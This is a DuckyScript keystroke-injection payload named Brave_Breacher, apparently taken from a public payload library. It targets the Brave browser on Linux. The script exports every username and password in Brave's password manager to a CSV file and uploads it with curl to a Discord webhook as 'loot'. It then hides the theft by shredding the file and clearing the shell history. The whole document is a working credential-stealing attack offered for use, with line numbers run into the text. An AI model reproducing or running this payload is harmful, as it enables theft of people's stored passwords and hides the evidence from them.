Path: blob/master/payloads/library/credentials/Brave_Breacher/Brave_Breacher.txt
2968 views
REM TITLE: Brave_Breacher1REM AUTHOR: OSINTI4L (https://github.com/OSINTI4L)2REM TARGET OS: Linux (tested on Pop!_OS) | Brave Browser Flatpak Version: 1.77.1013REM DESCRIPTION: Brave Breacher is a side-channel attack payload that utilizes various methods to navigate the Brave Browser GUI. The payload exports a copy of all usernames and passwords stored in the Brave Browser password manager. It then exfiltrates the file via discord webhook and obfuscates its' activity by closing all opened windows, clearing the terminal history, and shredding the exported 'Brave Passwords.csv' file once exfiltrated. To be operable, place Discord webhook in #WEBHOOK_URL constant on line 6.45DEFINE #WEBHOOK_URL https://discord.com/api/webhooks/PLACE/DISCORD/WEBHOOK67REM Begin attack:8ATTACKMODE HID9DELAY 10001011REM Launching Brave Browser:12INJECT_MOD13GUI14DELAY 20015STRING brav16DELAY 10017ENTER18DELAY 6001920REM Accessing password manager:21STRINGLN brave://password-manager/passwords22DELAY 3002324REM Password manager is now open.25REM Navigating to password manager settings menu:26REPEAT 2 TAB27DELAY 5028DOWN29DELAY 5030ENTER31DELAY 503233REM Downloading "Brave Passwords.csv" locally to home directory:34REPEAT 4 TAB35ENTER36DELAY 12537ENTER38DELAY 4003940REM Closing Brave Browser:41CTRL w4243REM Opening terminal window:44DELAY 20045CTRL ALT t46DELAY 3004748REM Exfiltrating "Brave Passowrds.csv" via Discord webhook:49STRINGLN curl -X POST -H "Content-Type: multipart/form-data" \50STRINGLN -F "file=@/home/$USER/Brave Passwords.csv" \51STRINGLN -F "content=$ Loot Incoming $" \52STRINGLN #WEBHOOK_URL53DELAY 1005455REM Shredding 'Brave Passwords.csv', clearing terminal session history, and exiting terminal to obfuscate activity:56STRINGLN shred -fuz 'Brave Passwords.csv'57DELAY 2558STRINGLN history -c59DELAY 2560STRINGLN exit616263